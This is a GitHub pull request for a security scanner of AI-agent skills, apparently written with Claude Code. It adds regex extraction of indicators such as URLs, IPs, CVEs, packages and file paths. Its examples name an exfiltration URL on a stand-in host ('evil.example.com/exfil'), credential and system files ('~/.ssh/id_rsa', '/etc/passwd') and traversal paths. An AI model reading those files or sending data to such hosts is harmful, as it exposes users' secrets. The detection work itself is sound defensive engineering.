feat(ml): structured indicator extraction (Item C) by kurtpayne · Pull Request #208 · kurtpayne/skillscan-security

kurtpayne · 2026-04-26T22:44:39Z

Summary

Item C of the post-v4.7 pivot. Replaces `affected_lines: [12]` with `indicators: [{type, value, line}]` so output goes from "look at line 12" to "look at the curl-to-evil.example.com on line 12."

Adds:

`Indicator` — pydantic model in `models.py` (type / value / line / evidence)
`Finding.indicators` — new optional `list[Indicator]` field, default `[]` (backward-compatible)
`skillscan.indicators` — regex-based extractor module
`extract_indicators()` — wired into `ml_detector.py` (runs once per file, attached to every label-specific `PINJ-ML-001` Finding for that file)

No model retraining needed. Pure post-process at inference time.

Indicator types

type	source	example
`url`	http(s) URLs in skill text	`https://evil.example.com/exfil\`
`cve`	skill text + `reasoning`	`CVE-2026-12345`
`ip`	IPv4 dotted-quad with octet validation	`192.168.1.100`
`domain`	bare hostnames (excluding URL hosts and parent dupes)	`malicious-site.io`
`package`	npm scoped + pip/npm/yarn/pnpm install lines	`@evil/payload`, `requests==2.31.0`
`file_path`	/etc, /var, /tmp, /usr, /root paths; traversal; ~/.dotfile; Windows	`/etc/passwd`, `~/.ssh/id_rsa`, `../../etc/shadow`

Conservative posture

30-entry common-domain noise floor (github, npm, pypi, anthropic, …) — bare-domain match drops these
Lookbehind blocks parent-domain duplicates (`nist.gov` inside `nvd.nist.gov` is suppressed)
URL terminator-aware: shell substitution `$(...)` and backticks don't get absorbed
Hard cap of 50 indicators per finding
Extractor wrapped in try/except — a regex bug never breaks the scanner

Test plan

`SKILLSCAN_NO_USER_RULES=1 pytest tests/test_indicators.py -v` — 25/25 passing
Full suite (excluding 7 stale-rule tests already fixed by test: align test_rules.py with rules-snapshot at 2026.04.25 (unblocks main) #204): 738 passed, 8 skipped
`ruff format` + `ruff check` — clean on all touched files
Manual smoke against the bundled v4 GGUF on a few held-out files

Compatibility

Strictly additive: `Finding.indicators` defaults to `[]`. Existing JSON / SARIF / JUnit consumers see an empty list (or the field omitted depending on serialization) and behave unchanged. Older clients that don't know about the field will simply ignore it.

🤖 Generated with Claude Code

codecov · 2026-04-26T23:00:46Z

Codecov Report

❌ Patch coverage is 93.37017% with 12 lines in your changes missing coverage. Please review.
✅ Project coverage is 76.38%. Comparing base (f72c00e) to head (b80716e).
⚠️ Report is 2 commits behind head on main.

Files with missing lines	Patch %	Lines
src/skillscan/indicators.py	94.67%	9 Missing ⚠️
src/skillscan/ml_detector.py	50.00%	3 Missing ⚠️

Additional details and impacted files

@@            Coverage Diff             @@
##             main     #208      +/-   ##
==========================================
+ Coverage   75.87%   76.38%   +0.51%     
==========================================
  Files          41       42       +1     
  Lines        5994     6175     +181     
==========================================
+ Hits         4548     4717     +169     
- Misses       1446     1458      +12

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

Item C of the post-v4.7 pivot. Replaces "look at line 12" with "look at the curl to evil.example.com on line 12" by post-processing the model's output (no retraining required). Adds: - skillscan.models.Indicator — pydantic model with type/value/line/evidence - skillscan.models.Finding.indicators — new optional list field (default [], backward-compatible with all existing consumers) - skillscan.indicators — extractor module with regex-based extractors for 6 indicator types: url — http(s) URLs (terminator-aware: shell substitution $(...) and backticks don't get absorbed) cve — CVE-YYYY-NNNN[NNN], also extracted from `reasoning` text (model often cites CVEs not in skill body) ip — IPv4 dotted-quad with octet validation; localhost noise floor (127.x, 0.0.0.0) domain — bare hostnames not already surfaced by URL extractor; lookbehind blocks parent-domain dupes (`nist.gov` inside `nvd.nist.gov`); 30-entry common-domain noise floor (github, npm, pypi, anthropic, ...) package — npm scoped (@scope/name) anywhere; pip/npm/yarn/pnpm install command line capture (multi-package) file_path — /etc, /var, /tmp, /usr, /root system paths; ../../traversal; ~/.dotfiles; Windows C:\ - 25 unit tests covering each extractor and a realistic-skill integration - Wiring in ml_detector.py: extract_indicators() runs once per file and the same list is attached to each label-specific Finding produced. Wrapped in try/except — extractor failure never breaks the scanner. Conservative posture: when in doubt, drop. False indicators are worse than missing ones because they give downstream tooling bad targets to act on. Cap is 50 indicators per finding. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

kurtpayne mentioned this pull request Apr 26, 2026

feat(scan): defense-in-depth triage hints (Item E) #211

Open

4 tasks

kurtpayne force-pushed the feat/ml-indicators branch from 05625f8 to b80716e Compare April 27, 2026 00:09

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

feat(ml): structured indicator extraction (Item C)#208

feat(ml): structured indicator extraction (Item C)#208
kurtpayne wants to merge 1 commit into
mainfrom
feat/ml-indicators

kurtpayne commented Apr 26, 2026

Uh oh!

codecov Bot commented Apr 26, 2026 •

edited

Loading

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

Conversation

kurtpayne commented Apr 26, 2026

Summary

Indicator types

Conservative posture

Test plan

Compatibility

Uh oh!

codecov Bot commented Apr 26, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

Codecov Report

Uh oh!

Reviewers

Assignees

Labels

Projects

Milestone

Development

Uh oh!

1 participant

codecov Bot commented Apr 26, 2026 •

edited

Loading